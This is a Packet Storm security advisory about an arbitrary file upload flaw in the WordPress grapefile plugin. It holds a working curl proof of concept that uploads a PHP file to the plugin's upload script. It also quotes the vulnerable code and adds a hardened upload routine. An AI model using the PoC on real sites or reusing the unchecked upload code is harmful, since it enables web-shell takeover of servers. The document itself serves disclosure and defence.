WordPress Grapefile 1.1 Shell Upload

2011-08-31T00:00:00
ID PACKETSTORM:104622
Type packetstorm
Reporter Hrvoje Spoljar
Modified 2011-08-31T00:00:00

Description

                                        
`Title: WordPress grapefile plugin <= 1.1 Arbitrary file upload  
Date: 30-8-2011  
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]  
Version: 1.1  
Software link: http://wordpress.org/extend/plugins/grapefile/  
  
PoC:  
curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php  
  
File(s): grapeupload.php grapeupload2.php grapeupload3.php grapeupload4.php  
Vulnerable code:  
$uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';  
// The client-supplied file name, extension included, becomes the stored name.  
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);  
  
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {  
    echo "success";  
}  
  
`
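
A hardened form of the upload step quoted above, as an added example that is not part of the original advisory or the plugin's code. `ALLOWED_TYPES` and `store_upload()` are hypothetical names, the `video/x-msvideo` allowlist entry assumes the `avi` directory is meant for AVI video, and the caller is assumed to have authenticated the request already.

```php
<?php
// Added example, not the plugin's code. ALLOWED_TYPES and store_upload()
// are hypothetical names introduced for illustration.

// Allowlist: permitted extension => MIME type expected from the file content.
// Assumption: the filestore/avi/ directory is meant to hold AVI video only.
const ALLOWED_TYPES = [
    'avi' => 'video/x-msvideo',
];

function store_upload(array $file, string $destDir): ?string
{
    // Reject failed uploads and anything that did not arrive via HTTP POST.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }

    // The client-supplied name is used only to look up the final extension
    // in the allowlist; "mycode.php" is rejected here.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // Detect the type from the bytes on disk, not from $_FILES[...]['type'],
    // which is sent by the client. "mycode.php.avi" is rejected here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }

    // Server-generated name: the client controls neither the stored file
    // name nor its extension.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;

    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Caller. Assumption: authentication and authorization (in WordPress, a
// logged-in user with the upload_files capability and a valid nonce) have
// been enforced before this point.
if (isset($_FILES['userfile'])) {
    $dir = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/grapefile/filestore/avi';
    $stored = store_upload($_FILES['userfile'], $dir);
    http_response_code($stored === null ? 400 : 200);
    echo $stored === null ? 'rejected' : 'success';
}
```

Serving the storage directory with PHP execution disabled keeps a file that slips past these checks from running as code.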